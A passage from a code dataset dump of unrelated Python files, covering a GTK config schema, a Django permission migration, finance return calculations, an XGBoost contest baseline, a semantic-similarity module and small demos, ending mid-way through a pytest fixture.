AttributeDict(type=int),\n\t\t\t\t\tzero = AttributeDict(type=int),\n\t\t\t\t\tsilence = AttributeDict(type=int),\n\t\t\t\t\tscale = AttributeDict(type=float),\n\t\t\t\t),\n\t\t\t\tcolor = dict(\n\t\t\t\t\tfg = AttributeDict(type=Gdk.RGBA),\n\t\t\t\t\tautofg = AttributeDict(type=Gdk.RGBA),\n\t\t\t\t\tbg = AttributeDict(type=Gdk.RGBA),\n\t\t\t\t\tauto = AttributeDict(type=bool),\n\t\t\t\t),\n\t\t\t\toffset = dict(\n\t\t\t\t\tleft = AttributeDict(type=int),\n\t\t\t\t\tright = AttributeDict(type=int),\n\t\t\t\t\ttop = AttributeDict(type=int),\n\t\t\t\t\tbottom = AttributeDict(type=int),\n\t\t\t\t),\n\t\t\t\twindow = dict(\n\t\t\t\t\tmaximize = AttributeDict(type=bool),\n\t\t\t\t\tbelow = AttributeDict(type=bool),\n\t\t\t\t\tstick = AttributeDict(type=bool),\n\t\t\t\t\twinbyscreen = AttributeDict(type=bool),\n\t\t\t\t\timagebyscreen = AttributeDict(type=bool),\n\t\t\t\t\tbgpaint = AttributeDict(type=bool),\n\t\t\t\t\tfullscreen = AttributeDict(type=bool),\n\t\t\t\t\tskiptaskbar = AttributeDict(type=bool),\n\t\t\t\t),\n\t\t\t\timage = dict(\n\t\t\t\t\tshow = AttributeDict(type=bool),\n\t\t\t\t\tusetag = AttributeDict(type=bool),\n\t\t\t\t\tva = AttributeDict(type=bool),\n\t\t\t\t\tha = AttributeDict(type=bool),\n\t\t\t\t\tdefault = AttributeDict(type=str)\n\t\t\t\t),\n\t\t\t\tautocolor = dict(\n\t\t\t\t\tbands = AttributeDict(type=int),\n\t\t\t\t\twindow = AttributeDict(type=int),\n\t\t\t\t\tsaturation_min = AttributeDict(type=float),\n\t\t\t\t\tvalue_min = AttributeDict(type=float),\n\t\t\t\t\tisize = AttributeDict(type=\"ilist\"),\n\t\t\t\t),\n\t\t\t\tplayer = dict(\n\t\t\t\t\tvolume = AttributeDict(type=float),\n\t\t\t\t\tshuffle = AttributeDict(type=bool),\n\t\t\t\t\tshowqueue = AttributeDict(type=bool),\n\t\t\t\t),\n\t\t\t\tmisc = dict(\n\t\t\t\t\thint = AttributeDict(type=\"hint\", valid=GTK_WINDOW_TYPE_HINTS),\n\t\t\t\t\tdsize = AttributeDict(type=\"ilist\"),\n\t\t\t\t\tcursor_hide_timeout = AttributeDict(type=int),\n\n\t\t\t\t),\n\t\t\t\tkeys = dict(\n\t\t\t\t\texit = AttributeDict(type=\"accel\", valid=accel),\n\t\t\t\t\tnext = AttributeDict(type=\"accel\", valid=accel),\n\t\t\t\t\tplay = AttributeDict(type=\"accel\", valid=accel),\n\t\t\t\t\tshow = AttributeDict(type=\"accel\", valid=accel),\n\t\t\t\t\thide = AttributeDict(type=\"accel\", valid=accel),\n\t\t\t\t),\n\t\t\t)\n\t\t)\n\n\tdef read_data(self):\n\t\tsuper().read_data()\n\t\tself._validate_default_bg()\n\n\tdef _validate_default_bg(self):\n\t\tif not self[\"image\"][\"default\"]:\n\t\t\tlogger.info(\"Default wallpaper not defined, setting config option to fallback value.\")\n\t\t\tself._set_fallback_bg()\n\t\telif not os.path.isfile(self[\"image\"][\"default\"]):\n\t\t\tlogger.warning(\"Default wallpaper file not valid, resetting config option to fallback value.\")\n\t\t\tself._set_fallback_bg()\n\n\tdef _set_fallback_bg(self):\n\t\tself[\"image\"][\"default\"] = os.path.join(os.path.dirname(self.defconfig), DEFAULT_WALLPAPER_FILE)\n\n\tdef write_data(self):\n\t\tsuper().write_data()\n\t\tself.save_data()\n","sub_path":"cavalcade/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"652798885","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lti_permissions', '0001_initial'),\n ]\n\n operations = [\n migrations.RunSQL(\n sql=\"INSERT INTO lti_permissions_ltipermission \"\n \"(permission, school_id, canvas_role, allow) \"\n \"VALUES ('manage_courses', '*', 'AccountAdmin', '1'),\"\n \"('manage_courses', '*', 'Account Admin', '1'),\"\n \"('manage_courses', '*', 'Account admin', '1'),\"\n \"('manage_courses', '*', 'SchoolLiaison', '1');\",\n reverse_sql=\"delete from lti_permissions_ltipermission where permission='manage_courses';\",\n ),\n ]\n\n","sub_path":"canvas_site_creator/migrations/0001_insert_lti_permissions.py","file_name":"0001_insert_lti_permissions.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"139936941","text":"from employee import SalaryEmployee, HourlyEmployee, CommissionEmployee\nfrom payroll import PayrollSystem\n\n\ndef run():\n salary_employee = SalaryEmployee(1, 'John Smith', 1500)\n hourly_employee = HourlyEmployee(2, 'John Dee', 40, 15)\n commission_employee = CommissionEmployee(3, 'Kevin Bacon', 1000, 250)\n payroll_system = PayrollSystem()\n payroll_system.calculate_payroll([\n salary_employee,\n hourly_employee,\n commission_employee,\n ])\n\n\nif __name__ == '__main__':\n run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"465041568","text":"from scipy.optimize import newton\nimport numpy as np\n\n\n#############\n# standard dfs\n#############\ndef _get_merged_flow_and_value_df(flow_df, value_df):\n # test that the first df has a flow column and the second a value column\n assert 'flow' in flow_df.columns and 'value' in value_df.columns\n # merge the dfs and sort for date\n df = flow_df.merge(value_df, how='outer')\n df.sort_values(axis='rows', by=['date'], inplace=True)\n # test that in the last row is a value\n print(df)\n assert not np.isnan(df.iloc[-1, df.columns.get_loc('value')])\n # test that there are is always a value after a flow\n for i in range(0, df.shape[0]):\n if not np.isnan(df.iloc[i, df.columns.get_loc('flow')]):\n assert np.isnan(df.iloc[i + 1, df.columns.get_loc('flow')])\n # return the new df\n return df\n\n\ndef _get_value_with_flow_df(flow_df, value_df):\n # get the right df\n df = _get_merged_flow_and_value_df(flow_df, value_df)\n # shift the flows up to the values\n df.loc[:, 'flow'] = df.loc[:, 'flow'].shift(1)\n # drop the old flow rows\n df = df.loc[df.loc[:, 'value'].notna()]\n # test that the length is equal to the length of the value df\n assert len(df.index) == len(value_df.index)\n # fill the nan flow with 0\n df.loc[:, 'flow'].fillna(0, inplace=True)\n # return the combined df\n return df\n\n\n#############\n# time weighted return\n#############\ndef get_time_weighted_return_df(flow_df, value_df):\n # get the right df\n df = _get_value_with_flow_df(flow_df, value_df)\n # calculate twr for each sub period\n df.loc[:, 'twr'] = (df.loc[:, 'value'] - df.loc[:, 'flow']) / df.loc[:, 'value'].shift(1)\n # fill the first row twr value as it is nan\n df.iloc[0, df.columns.get_loc('twr')] = 1\n # return the df\n return df\n\n\ndef get_time_weighted_return(df):\n # test that all necessary columns are available\n assert 'twr' in df.columns\n # return nan if there are nan values in the twr column\n if df.loc[:, 'twr'].isnull().values.any():\n return np.nan\n # calculate twr\n time_weighted_return = df.loc[:, 'twr'].product() - 1\n # return the rate\n return time_weighted_return\n\n\n#############\n# internal rate of return\n#############\ndef get_internal_rate_of_return_df(flow_df, value_df):\n # get the right df\n df = _get_merged_flow_and_value_df(flow_df, value_df)\n # move the first value to the flow column if there is no flow\n if np.isnan(df.iloc[0, df.columns.get_loc('flow')]):\n df.iloc[0, df.columns.get_loc('flow')] = df.iloc[0, df.columns.get_loc('value')]\n # flip the flows\n df.loc[:, 'flow'] = df.loc[:, 'flow'] * (-1)\n # get the last value as flow\n df.iloc[-1, df.columns.get_loc('flow')] = df.iloc[-1, df.columns.get_loc('value')]\n # drop the nan rows\n df = df.loc[df.loc[:, 'flow'].notna()]\n # test that the length is equal to the length of the flow df plus the last row of the value df\n assert len(df.index) == len(flow_df.index) + 1 or len(df.index) == len(flow_df.index) + 2\n # drop the value column\n df = df.loc[:, ['date', 'flow']]\n # add the days column\n df.loc[:, 'days'] = df.loc[:, 'date'] - df.iloc[0, df.columns.get_loc('date')]\n # convert the days column to a number in days\n df.loc[:, 'days'] = df.loc[:, 'days'].map(lambda x: x.days)\n # return the df\n return df\n\n\ndef custom_xnpv(rate, df):\n # test that all necessary columns are available\n assert 'flow' in df.columns and 'days' in df.columns\n # calculation\n xnpv = 0\n for i in range(0, df.shape[0]):\n xnpv += df.iloc[i, df.columns.get_loc('flow')] / (1 + rate) ** df.iloc[i, df.columns.get_loc('days')]\n # return the\n return xnpv\n\n\ndef get_daily_internal_rate_of_return(df, guess=0.000210874):\n # test that all necessary columns are available\n assert 'flow' in df.columns and 'days' in df.columns\n # return nan if the last flow is 0 because that means that there is no money invested anymore\n if df.iloc[-1, df.columns.get_loc('flow')] == 0:\n return np.nan\n # calculate the internal rate of return\n internal_rate_of_return = newton(lambda rate: custom_xnpv(rate, df), guess)\n # return the rate\n return internal_rate_of_return\n\n\ndef get_internal_rate_of_return(df):\n # get the daily rate\n internal_rate_of_return = get_daily_internal_rate_of_return(df)\n # turn the daily rate into the rate of the period\n internal_rate_of_return = (1 + internal_rate_of_return) ** (df.iloc[-1, df.columns.get_loc('days')])\n # return the rate\n return internal_rate_of_return\n\n\n#############\n# current return\n#############\ndef get_current_return_df(flow_df, value_df):\n # get the right df\n df = _get_value_with_flow_df(flow_df, value_df)\n # copy the first value to the flow column if there is no flow\n if df.iloc[0, df.columns.get_loc('flow')] == 0:\n df.iloc[0, df.columns.get_loc('flow')] = df.iloc[0, df.columns.get_loc('value')]\n # init the invested_capital column\n df.loc[:, 'invested_capital'] = None\n # calculate the invested capital\n for i in range(0, df.shape[0]):\n flow = df.iloc[i, df.columns.get_loc('flow')]\n previous_invested_capital = df.iloc[i-1, df.columns.get_loc('invested_capital')] if i > 0 else 0\n if flow > 0:\n invested_capital = previous_invested_capital + flow\n elif flow < 0:\n value = df.iloc[i, df.columns.get_loc('value')]\n invested_capital = previous_invested_capital * (value / (abs(flow) + value))\n else:\n invested_capital = previous_invested_capital\n df.iloc[i, df.columns.get_loc('invested_capital')] = invested_capital\n # calculate the current return\n df.loc[:, 'current_return'] = df.loc[:, 'value'] / df.loc[:, 'invested_capital']\n # return the df\n return df\n\n\ndef get_current_return(df):\n # test that all necessary columns are available\n assert 'current_return' in df.columns\n # current return of a period is always the last value\n current_return = df.iloc[-1, df.columns.get_loc('current_return')]\n # return the current return\n return current_return\n","sub_path":"finance/core/return_calculation.py","file_name":"return_calculation.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"611068236","text":"import time\n\nfrom SalleEvenement import *\n\nclass SalleLevier(SalleEvenement):\n def __init__(self,isExplore, gameMap, x, y, salleDroite, salleGauche, salleHaut, salleBas):\n SalleEvenement.__init__(self, isExplore, x, y, salleDroite, salleGauche, salleHaut, salleBas)\n self.__gameMap = gameMap\n\n def declancherEvenement(self):\n if (self.__gameMap.getLevierActive() == False):\n print(\"Vous trouvez et activez un levier.\")\n print(\"Vous entendez un bruit sourd au loin...\")\n self.__gameMap.setLevierActive(True)\n time.sleep(1.5)\n else:\n i = randint(0,7)\n if i<=1:\n return \"bagarre\"\n","sub_path":"Code python/SalleLevier.py","file_name":"SalleLevier.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"617463188","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom xgboost import XGBClassifier\nfrom xgboost import XGBRegressor\nfrom sklearn.metrics import roc_auc_score\nimport os\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\nimport lightgbm as lgb\nimport catboost as cbt\nimport category_encoders as ce\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import KFold, StratifiedKFold, train_test_split\n\n\nsubmission = pd.read_csv('./data/submission.csv')\ntrain = pd.read_csv('./data/train.csv')\ntest = pd.read_csv('./data/test.csv')\ntrain_label = pd.read_csv('./data/train_label.csv')\n\ntrain.head()\n\nnp.where(train.isnull().sum()/train.shape[0] < 0.5)[0]\ntrain.columns[np.where(train.isnull().sum()/train.shape[0] < 0.5)[0]]\n\ncolumns = ['ID', '企业类型', '登记机关', '企业状态', '邮政编码', '注册资本', '核准日期', '行业代码', '经营期限自',\n '成立日期', '行业门类', '企业类别', '管辖机关', '经营范围', '增值税', '企业所得税', '印花税', '教育费',\n '城建税']\n\ntrain[columns].isnull().sum()/train.shape[0]\n\ntrain['经营范围'].map(lambda x: len(x))\n\nfeature = ['企业类型', '登记机关', '企业状态', '注册资本', '行业代码',\n '行业门类', '企业类别', '管辖机关', '经营范围', '增值税', '企业所得税', '印花税', '教育费',\n '城建税']\n\ntrain[feature].head()\n\ntrain = train.merge(train_label, on='ID', how='left')\n\ndata = train.append(test)\n\ndata['经营范围'] = data['经营范围'].map(lambda x: len(x))\n\nobject_col = ['企业类型', '行业门类', '企业类别', '管辖机关']\nfor i in tqdm(object_col):\n lbl = LabelEncoder()\n data[i] = lbl.fit_transform(data[i].astype(str))\n data[i] = data[i]\n\ndata['企业所得税与增值税之比'] = data['增值税']/data['企业所得税']\n\nfeature += ['企业所得税与增值税之比']\n\ntr_index = ~data['Label'].isnull()\ntrain = data[tr_index].reset_index(drop=True)\ny = data[tr_index]['Label'].reset_index(drop=True).astype(int)\ntest = data[~tr_index].reset_index(drop=True)\nprint(train.shape, test.shape)\n\n\ndef lgb_roc_auc_score(y_hat, data):\n y_true = data.get_label()\n y_hat = np.round(y_hat)\n return 'f1', roc_auc_score(y_true, y_hat), True\n\n\nfi = []\ncv_score = []\ntest_pred = np.zeros((test.shape[0],))\nskf = StratifiedKFold(n_splits=5, random_state=2019, shuffle=True)\n\n\nfor index, (train_index, test_index) in enumerate(skf.split(train, y)):\n print(index)\n train_x, test_x, train_y, test_y = train.iloc[train_index], train.iloc[\n test_index], y.iloc[train_index], y.iloc[test_index]\n\n xgb_model = XGBRegressor(learning_rate=0.1,\n n_estimators=1000,\n max_depth=5,\n gamma=0,\n verbosity=1,\n subsample=0.8,\n # min_child_weight=1, \n objective='binary:logistic')\n eval_set = [(train_x[feature], train_y), (test_x[feature], test_y)]\n xgb_model.fit(train_x[feature], train_y, \n early_stopping_rounds = 20,\n eval_metric=[\"error\", \"logloss\",'auc'], \n eval_set=eval_set, verbose=20)\n\n y_val = xgb_model.predict(test_x[feature])\n # print(\"roc_auc:\", roc_auc_score(test_y, np.round(y_val)))\n print(\"roc_auc:\", roc_auc_score(test_y, y_val))\n cv_score.append(roc_auc_score(test_y, y_val))\n print(\"cv_score:\", cv_score[index])\n # test_pred += np.round(xgb_model.predict(test[feature])) / 5\n test_pred += xgb_model.predict(test[feature]) / 5\n# test_pred = [0.0 if r < 2.5 else 1.0 for r in test_pred ]\n\nsubmission['Label'] = test_pred\nsubmission.to_csv('submission_xgboost.csv', index=False)\n","sub_path":"shixinqiye/code/baseline_xgboost.py","file_name":"baseline_xgboost.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"125757535","text":"# -*- coding: utf-8 -*-\n\n################################################################################\n#\n#\tName: similarity.py\n#\tAuthor: Aaron[aderakhs@ualberta.ca]\n#\tDescription: Implements Semantic similarity measure for KNN learning algorithm\n# based on Word2Vec[https://arxiv.org/abs/1301.3781] and based on\n# Doc2Vec [https://arxiv.org/abs/1405.4053].\n#\n################################################################################\nimport Utility as util\nfrom scipy.spatial.distance import cosine\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom nltk.corpus import wordnet\nfrom gensim.models import Doc2Vec\nfrom gensim.test.test_doc2vec import ConcatenatedDoc2Vec\nfrom gensim.models.doc2vec import TaggedDocument\nimport gensim.models.doc2vec\nimport multiprocessing\nimport warnings, random, pickle, time\n\n\nclass SemanticSimilarity:\n # measures the similarity between 2 sentences based on their components vector representations\n @staticmethod\n def cosine(sentence_1, sentence_2, combination='avg', window_size=None):\n # gets two list (sentence_1 and sentence_2) as two vector representation of returns the cosine similarity\n # of said sentences\n if combination == 'avg':\n # average mode\n return 1-cosine(util.avg(sentence_1), util.avg(sentence_2)) \n else:\n # Concatenate mode with sliding window\n if window_size != None:\n # if window size is set then a global window size would be used for both sentences\n # we assume that the window size is smaller than the size of list\n if (len(sentence_1) < window_size) or (len(sentence_2) < window_size):\n raise ValueError('`Window-size` should be smaller that length of vectors')\n else:\n return max([\n 1-cosine(util.cat(sentence_1[i:i+window_size]), util.cat(sentence_2[j:j+window_size]))\n ] for j in range(len(sentence_2)-window_size+1) for i in range(len(sentence_1)-window_size+1))\n else:\n # if a global window size has not been set then the length of smaller sentence would be considered\n # the window size\n if len(sentence_1) == len(sentence_2):\n # if both sentences are of the same size\n return 1-cosine(util.cat(sentence_1), util.cat(sentence_2))\n else:\n smaller, larger = (sentence_1, sentence_2) if len(sentence_1) < len(sentence_2) else (sentence_2, sentence_1)\n\n return max([\n 1-cosine(util.cat(smaller), util.cat(larger[i:i+len(smaller)]))\n ] for i in range(len(larger)-len(smaller)+1) )\n \n class Mihalcea2006:\n # Based on paper \"Mihalcea, Rada, Courtney Corley, and Carlo Strapparava. \n # Corpus-based and knowledge-based measures of text semantic similarity. AAAI. Vol. 6. 2006.\"\n # [https://www.aaai.org/Papers/AAAI/2006/AAAI06-123.pdf]\n def __init__(self, corpus):\n # In this implementation we consider each sentence a document, therefore a corpus is a list of all the\n # sentences\n self.corpus = corpus\n self.vectorizer = TfidfVectorizer(min_df=1)\n\n def computeIDF(self):\n # computes the inverse document frequency (idf) and term frequency (tf-idf) for each token\n self.tfidf_matrix = self.vectorizer.fit_transform(self.corpus)\n self.idf = dict(zip(self.vectorizer.get_feature_names(), self.vectorizer.idf_))\n \n def similarity(self, sentence_1, sentence_2, word_similarity='embedded'):\n \"\"\"\n 1- Description: computes the similarity of two sentences (pairwise) according to word_similarity metrics\n and based on (Mihalcea et al., 2006) work according to following formula:\n\n Sim(sentence_1, sentence_2) = 1/2 * [\n (Sum_{w_i in sentence_1}(maxSim(w_i, sentence_2)*idf(w_i))/Sum_{w_i in sentence_1}(idf(w_i))) +\n (Sum_{w_i in sentence_2}(maxSim(w_i, sentence_1)*idf(w_i))/Sum_{w_i in sentence_2}(idf(w_i))) ] \n\n 2- Parameters: \n * [word_similarity] = (\"embedded\", \"WordNet\", \"JC\", \"LC\", \"LIN\", \"WP\", \"Resnik\") where:\n 1- \"embedded\" uses word vectors as word similarity metric\n 2- \"WordNet\" uses word net's path similarity, \"Return a score denoting how similar two word senses are, \n based on the shortest path that connects the senses in the is-a (hypernym/hypnoym) taxonomy. \n The score is in the range 0 to 1\" [http://www.nltk.org/howto/wordnet.html]\n 3- \"JC\" or Jiang-Conrath Similarity \"Returns a score denoting how similar two word senses are, \n based on the Information Content (IC) of the Least Common Subsumer (most specific ancestor node) \n and that of the two input Synsets. The relationship is given by the equation \n 1 / (IC(s1) + IC(s2) - 2 * IC(lcs)).\" [Jiang, Jay J., and David W. Conrath. \n \"Semantic similarity based on corpus statistics and lexical taxonomy.\" arXiv preprint \n cmp-lg/9709008 (1997).]\n 4- \"LC\" or Leacock-Chodorow Similarity \"Returns a score denoting how similar two word senses are, \n based on the shortest path that connects the senses (as above) and the maximum depth of the taxonomy \n in which the senses occur. The relationship is given as -log(p/2d) where p is the shortest path \n length and d the taxonomy depth.\" [Leacock, Claudia, and Martin Chodorow. \n \"Combining local context and WordNet similarity for word sense identification.\" \n WordNet: An electronic lexical database 49.2 (1998): 265-283.]\n 5- \"LIN\" \"Return a score denoting how similar two word senses are, based on the Information Content (IC) \n of the Least Common Subsumer (most specific ancestor node) and that of the two input Synsets. \n The relationship is given by the equation 2 * IC(lcs) / (IC(s1) + IC(s2)).\"[Lin, Dekang. \n \"An information-theoretic definition of similarity.\" Icml. Vol. 98. No. 1998. 1998.]\n 6- \"WP\" or Wu-Palmer Similarity \"Returns a score denoting how similar two word senses are, \n based on the depth of the two senses in the taxonomy and that of their Least Common Subsumer.\"\n [Wu, Zhibiao, and Martha Palmer. \"Verbs semantics and lexical selection.\" \n Proceedings of the 32nd annual meeting on Association for Computational Linguistics. \n Association for Computational Linguistics, 1994.]\n 7- \"Resnik\" \"Return a score denoting how similar two word senses are, based on the Information Content (IC) \n of the Least Common Subsumer.\" [Resnik, Philip. \"Using information content to evaluate semantic similarity in a taxonomy.\" \n arXiv preprint cmp-lg/9511007 (1995).]\n\n * [sentence_1 or sentence_2] should be in for of a dictionary as follows\n {\n \"tokens\": [list of tokens],\n \"vectors\": [list of word vectors (if using with embedded metric)]\n } \n \"\"\"\n\n if word_similarity == 'embedded':\n # computes the max similarity between a vector, which represents a token, and a list vectors \n max_sim = lambda vec, sentence: max([\n 1-cosine(vec, v_i) for v_i in sentence['vectors']\n ])\n\n return 0.5 * (\n (\n sum([max_sim(v_i, sentence_2) * self.idf[token_i['text'].lower()] for v_i, token_i in zip(sentence_1['vectors'], sentence_1['tokens']) if token_i['pos'] not in ['PUNCT', 'SYM', 'X', 'PART']]) / \n sum([self.idf[token_i['text'].lower()] for token_i in sentence_1['tokens'] if token_i['pos'] not in ['PUNCT', 'SYM', 'X', 'PART']])\n ) + (\n sum([max_sim(v_i, sentence_1) * self.idf[token_i['text'].lower()] for v_i, token_i in zip(sentence_2['vectors'], sentence_2['tokens']) if token_i['pos'] not in ['PUNCT', 'SYM', 'X', 'PART']]) / \n sum([self.idf[token_i['text'].lower()] for token_i in sentence_2['tokens'] if token_i['pos'] not in ['PUNCT', 'SYM', 'X', 'PART']])\n )\n )\n else:\n # gold part of speech annotation to WordNet annotations\n gold_to_wn_conversion = {\n u'N': wordnet.NOUN,\n u'J': wordnet.ADJ,\n u'V': wordnet.VERB,\n u'R': wordnet.ADV\n }\n\n synset_1 = [\n (wordnet.synsets(token['text'], gold_to_wn_conversion[token['tag'][0]])[0], token['text'].lower()) for token in sentence_1['tokens'] if token['tag'][0] in ['N', 'J', 'V', 'R'] and len(wordnet.synsets(token['text'], gold_to_wn_conversion[token['tag'][0]]))>0\n ]\n synset_2 = [\n (wordnet.synsets(token['text'], gold_to_wn_conversion[token['tag'][0]])[0], token['text'].lower()) for token in sentence_2['tokens'] if token['tag'][0] in ['N', 'J', 'V', 'R'] and len(wordnet.synsets(token['text'], gold_to_wn_conversion[token['tag'][0]]))>0\n ]\n # computes similarity of two word(token) according to WordNet similarity\n # on problem with WordNet similarity measure is that it is not symmetric to solve this problem we simply assume\n # word_sim(w1, w2) = max[wnSim(w1, w2), wnSim(w2, w1)]\n if word_similarity == 'WordNet':\n # use path_similarity\n word_sim = lambda synset1, synset2: max([synset1.path_similarity(synset2), synset2.path_similarity(synset1)])\n elif word_similarity == 'JC':\n # use Jiang-Conrath Similarity\n word_sim = lambda synset1, synset2: max([synset1.jcn_similarity(synset2), synset2.jcn_similarity(synset1)])\n elif word_similarity == 'LC':\n # use Leacock-Chodorow Similarity\n word_sim = lambda synset1, synset2: max([synset1.lch_similarity(synset2), synset2.lch_similarity(synset1)])\n elif word_similarity == 'LIN':\n # use Lin Similarity\n word_sim = lambda synset1, synset2: max([synset1.lin_similarity(synset2), synset2.lin_similarity(synset1)])\n elif word_similarity == 'WP':\n # use Wu-Palmer Similarity\n word_sim = lambda synset1, synset2: max([synset1.wup_similarity(synset2), synset2.wup_similarity(synset1)])\n else:\n # use Resnik Similarity\n word_sim = lambda synset1, synset2: max([synset1.res_similarity(synset2), synset2.res_similarity(synset1)])\n\n \n # computes the max similarity between a token and a list of tokens\n max_sim = lambda synset, synsets: max([\n word_sim(synset, synset_i) for synset_i, token in synsets\n ])\n\n return 0.5 * (\n (\n sum([max_sim(synset, synset_2) * self.idf[token] for synset, token in synset_1]) / \n sum([self.idf[token] for synset, token in synset_1])\n ) + (\n sum([max_sim(synset, synset_1) * self.idf[token] for synset, token in synset_2]) / \n sum([self.idf[token] for synset, token in synset_2])\n )\n )\n\n class Le2014:\n # Based on paper \"Le, Quoc, and Tomas Mikolov. Distributed representations of sentences and documents.\n # International Conference on Machine Learning. 2014.\" [https://cs.stanford.edu/~quocle/paragraph_vector.pdf]\n # We use the implementation provided by python-gensim\n # For more information and notes on implementation please read \n # [https://github.com/RaRe-Technologies/gensim/blob/develop/docs/notebooks/doc2vec-IMDB.ipynb]\n def __init__(self, corpus, cores=None, config=None):\n if (gensim.models.doc2vec.FAST_VERSION > -1) == False:\n warnings.warn('Native training module is not loaded. In this case the training process will take unrealistically long time. Please refer to README 1.d clause.')\n\n # The number of active cores for training the model\n if cores != None:\n self.cores = cores\n else:\n # if not set, use all the available cpu cores\n self.cores = multiprocessing.cpu_count()\n\n self.corpus = []\n for sentence in corpus:\n # Doc2Vec model takes TaggedDocument instances as sample, therefore we turn or corpus to a list of TaggedDocuments\n # Each taggedDocument has a list of tokens and a tag; a tag could be an unique id by which we later measure the \n # similarity of sentence to other sentences [https://radimrehurek.com/gensim/models/doc2vec.html#gensim.models.doc2vec.TaggedDocument]\n self.corpus.append(TaggedDocument(sentence.text.decode(\"utf-8\").split(),[unicode(sentence.id)]))\n\n # Training parameters\n # [todo] configuration file\n \n # learning rate\n self.alpha = 0.025\n\n # Minimum learning rate; learning rate is reduced in each pass\n self.min_alpha = 0.001\n\n # Number of iteration during which the system reduces the error rate\n self.passes = 20\n\n \n # Defines models to train\n # Original model proposed in the paper; distributed memory model w/ negative sampling, window size 10 and concatenation\n # [todo] config file\n self.models = [\n # Original model proposed in the paper; distributed memory model w/ negative sampling, window size 10 and concatenation\n Doc2Vec(dm=1, size=300, window=10, dm_concat=1, negative=5, hs=0, min_count=2, workers=self.cores),\n\n # Original model proposed in the paper; distributed bag of words w/ negative sampling, window size 10 and concatenation\n Doc2Vec(dm=0, size=300, window=10, dm_concat=1, negative=5, hs=0, min_count=2, workers=self.cores),\n\n # Original model proposed in the paper; distributed memory model w/ negative sampling, window size 10 and average vectors\n Doc2Vec(dm=1, size=300, window=10, dm_mean=1, negative=5, hs=0, min_count=2, workers=self.cores)\n ]\n\n # we build vocab for one model and copy it to other models\n self.models[0].build_vocab(self.corpus)\n\n for model in self.models[1:3]:\n model.reset_from(self.models[0])\n \n\n # Combined models; \"Le and Mikolov notes that combining a paragraph vector from Distributed Bag of Words (DBOW) \n # and Distributed Memory (DM) improves performance.\"\n self.models.append(ConcatenatedDoc2Vec([self.models[0], self.models[1]]))\n self.models.append(ConcatenatedDoc2Vec([self.models[1], self.models[2]]))\n\n def train(self):\n # trains the system and produces the vectors\n random.shuffle(self.corpus)\n for model in self.models:\n model.train(self.corpus, total_examples=len(self.corpus), epochs=self.passes, start_alpha=self.alpha, end_alpha=self.min_alpha)\n\n def similarity(self, sentence_1, sentence_2):\n return sum([\n 1-cosine(model.docvecs[unicode(sentence_1.id)], model.docvecs[unicode(sentence_2.id)]) for model in self.models[0:3]\n ])/3\n \n def save(self):\n with open(\"le2014-%s.pickle\"%time.strftime(\"%Y-%m-%d-%H.%M.%S\"), 'w') as out:\n out.write(pickle.dumps(self))\n\nclass StatisticSimilarity:\n # Measures the statistical similarity amongst sentences\n @staticmethod\n def tfidf(corpus):\n # gets a corpus in form of a list of strings and computes the tfidf matrix\n return TfidfVectorizer().fit_transform(corpus)\n \n @staticmethod\n def tfidfSim(matrix, index):\n return cosine_similarity(matrix[index], matrix)\n\n","sub_path":"app/EntityAnalysis/SemanticSimilarity.py","file_name":"SemanticSimilarity.py","file_ext":"py","file_size_in_byte":16925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122140454","text":"#!/usr/bin/env python\n\nimport cli.app\n\n@cli.app.CommandLineApp\ndef lsof(app):\n app.stdout.write('running %s' % app.name)\n\nlsof.add_param(\"-a\", help=\"causes list selection options to be ANDed, as described above.\", default=False, action=\"store_true\")\nlsof.add_param(\"-b\", help=\"causes lsof to avoid kernel functions that might block - lstat(2), readlink(2), and stat(2).\", default=False, action=\"store_true\")\n\nif __name__ == '__main__':\n lsof.run()\n","sub_path":"examples/lsof.py","file_name":"lsof.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"345505538","text":"import argparse\nimport collections\n\ndefaults = {\n 'spam': 'default spam value',\n 'eggs': 'default egg value',\n}\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--spam')\nparser.add_argument('--eggs')\n\nargs = vars(parser.parse_args())\nprint(args)\n\nfiltered_args = {k: v for k, v in args.items() if v}\nprint(filtered_args)\n\ncombined = collections.ChainMap(filtered_args, defaults)\nprint(combined['spam'])\nprint(combined['eggs'])\nprint(combined)\nprint()","sub_path":"chianMapTest.py","file_name":"chianMapTest.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"569944761","text":"from test.perf.affinity import Topology\nfrom wait_for import TimedOutError\nimport time\nimport pytest\n\n\n@pytest.yield_fixture(\n scope=\"function\",\n params=[\n \"test/perf/topology-flat.yaml\",\n \"test/perf/topology-tree.yaml\",\n \"test/perf/topology-random.yaml\",\n ],\n ids=[\"flat\", \"tree\", \"random\"],\n)\ndef topology(request):\n topo = Topology.load_topology_from_file(request.param, use_diag_node=True)\n try:\n topo.start(wait=True)\n yield topo\n except TimedOutError:\n raise\n finally:\n print(f\"{time.time()} - Stopping current topo\")\n 